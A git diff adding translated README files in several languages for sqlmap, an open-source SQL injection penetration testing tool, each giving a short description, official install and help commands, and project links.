b/src/sqlmap-master/doc/translations/README-ko-KR.md new file mode 100644 index 0000000..229c112 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-ko-KR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다. + +스크린샷 +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +또는, wiki에 나와있는 몇몇 기능을 보여주는 [스크린샷 모음](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 을 방문하실 수 있습니다. + +설치 +---- + +[여기](https://github.com/sqlmapproject/sqlmap/tarball/master)를 클릭하여 최신 버전의 tarball 파일, 또는 [여기](https://github.com/sqlmapproject/sqlmap/zipball/master)를 클릭하여 최신 zipball 파일을 다운받으실 수 있습니다. + +가장 선호되는 방법으로, [Git](https://github.com/sqlmapproject/sqlmap) 저장소를 복제하여 sqlmap을 다운로드 할 수 있습니다: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. + +사용법 +---- + +기본 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요: + + python sqlmap.py -h + +전체 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요: + + python sqlmap.py -hh + +[여기](https://asciinema.org/a/46601)를 통해 사용 샘플들을 확인할 수 있습니다. +sqlmap의 능력, 지원되는 기능과 모든 옵션과 스위치들의 목록을 예제와 함께 보려면, [사용자 매뉴얼](https://github.com/sqlmapproject/sqlmap/wiki/Usage)을 참고하시길 권장드립니다. + +링크 +---- + +* 홈페이지: https://sqlmap.org +* 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki +* 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* 트위터: [@sqlmap](https://twitter.com/sqlmap) +* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-nl-NL.md b/src/sqlmap-master/doc/translations/README-nl-NL.md new file mode 100644 index 0000000..e419044 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-nl-NL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki. + +Installatie +---- + +Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken. + +Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**. + +Gebruik +---- + +Om een lijst van basisopties en switches te krijgen gebruik: + + python sqlmap.py -h + +Om een lijst van alle opties en switches te krijgen gebruik: + + python sqlmap.py -hh + +Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden. +Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen. + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues +* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki +* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-pl-PL.md b/src/sqlmap-master/doc/translations/README-pl-PL.md new file mode 100644 index 0000000..e8709ae --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-pl-PL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalających na dostęp do systemu plików oraz wykonywanie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia. + +Zrzuty ekranu +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości. + +Instalacja +---- + +Najnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. + +Sposób użycia +---- + +Aby uzyskać listę podstawowych funkcji i parametrów użyj polecenia: + + python sqlmap.py -h + +Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia: + + python sqlmap.py -hh + +Przykładowy wynik działania można znaleźć [tutaj](https://asciinema.org/a/46601). +Aby uzyskać listę wszystkich dostępnych funkcji, parametrów oraz opisów ich działania wraz z przykładami użycia sqlmap zalecamy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Odnośniki +---- + +* Strona projektu: https://sqlmap.org +* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Zgłaszanie błędów: https://github.com/sqlmapproject/sqlmap/issues +* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki +* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-pt-BR.md b/src/sqlmap-master/doc/translations/README-pt-BR.md new file mode 100644 index 0000000..bdd4500 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-pt-BR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. + +Imagens +---- + +![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki. + +Instalação +---- + +Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. + +Como usar +---- + +Para obter uma lista das opções básicas faça: + + python sqlmap.py -h + +Para obter a lista completa de opções faça: + + python sqlmap.py -hh + +Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601). +Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki +* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos) +* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-rs-RS.md b/src/sqlmap-master/doc/translations/README-rs-RS.md new file mode 100644 index 0000000..a76836d --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-rs-RS.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza. + +Slike +---- + +![Slika](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od e se demonstriraju neke od funkcija na wiki stranicama. + +Instalacija +---- + +Možete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. + +Korišćenje +---- + +Kako biste dobili listu osnovnih opcija i prekidača koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidača koristite: + + python sqlmap.py -hh + +Možete pronaći primer izvršavanja [ovde](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidača, zajedno s primerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linkovi +---- + +* Početna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki +* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-ru-RU.md b/src/sqlmap-master/doc/translations/README-ru-RU.md new file mode 100644 index 0000000..a24f304 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-ru-RU.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. + +Скриншоты +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki. + +Установка +---- + +Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. + +Использование +---- + +Чтобы получить список основных опций и вариантов выбора, используйте: + + python sqlmap.py -h + +Чтобы получить список всех опций и вариантов выбора, используйте: + + python sqlmap.py -hh + +Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601). +Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Ссылки +---- + +* Основной сайт: https://sqlmap.org +* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues +* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki +* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-sk-SK.md b/src/sqlmap-master/doc/translations/README-sk-SK.md new file mode 100644 index 0000000..42258e5 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-sk-SK.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení. + +Snímky obrazovky +---- + +![snímka obrazovky](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki. + +Inštalácia +---- + +Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme. + +Využitie +---- + +Na získanie zoznamu základných možností a prepínačov, použite: + + python sqlmap.py -h + +Na získanie zoznamu všetkých možností a prepínačov, použite: + + python sqlmap.py -hh + +Vzorku behu nájdete [tu](https://asciinema.org/a/46601). +Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linky +---- + +* Domovská stránka: https://sqlmap.org +* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues +* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki +* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/src/sqlmap-master/doc/translations/README-tr-TR.md b/src/sqlmap-master/doc/translations/README-tr-TR.md new file mode 100644 index 0000000..e48c9a4 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-tr-TR.md @@ -0,0 +1,53 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır. + + +Ekran görüntüleri +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. + + +Kurulum +---- + +[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz. + +Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. + +Kullanım +---- + + +Bütün basit seçeneklerin listesini gösterir + + python sqlmap.py -h + +Bütün seçenekleri gösterir + + python sqlmap.py -hh + +Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası için sqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz + +Bağlantılar +---- + +* Anasayfa: https://sqlmap.org +* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues +* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki +* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-uk-UA.md b/src/sqlmap-master/doc/translations/README-uk-UA.md new file mode 100644 index 0000000..0158edf --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-uk-UA.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання. + +Скриншоти +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ви можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki. + +Встановлення +---- + +Ви можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Найкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. + +Використання +---- + +Щоб отримати список основних опцій і перемикачів, використовуйте: + + python sqlmap.py -h + +Щоб отримати список всіх опцій і перемикачів, використовуйте: + + python sqlmap.py -hh + +Ви можете знайти приклад виконання [тут](https://asciinema.org/a/46601). +Для того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Посилання +---- + +* Основний сайт: https://sqlmap.org +* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues +* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki +* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-vi-VN.md b/src/sqlmap-master/doc/translations/README-vi-VN.md new file mode 100644 index 0000000..b792e29 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-vi-VN.md @@ -0,0 +1,52 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + 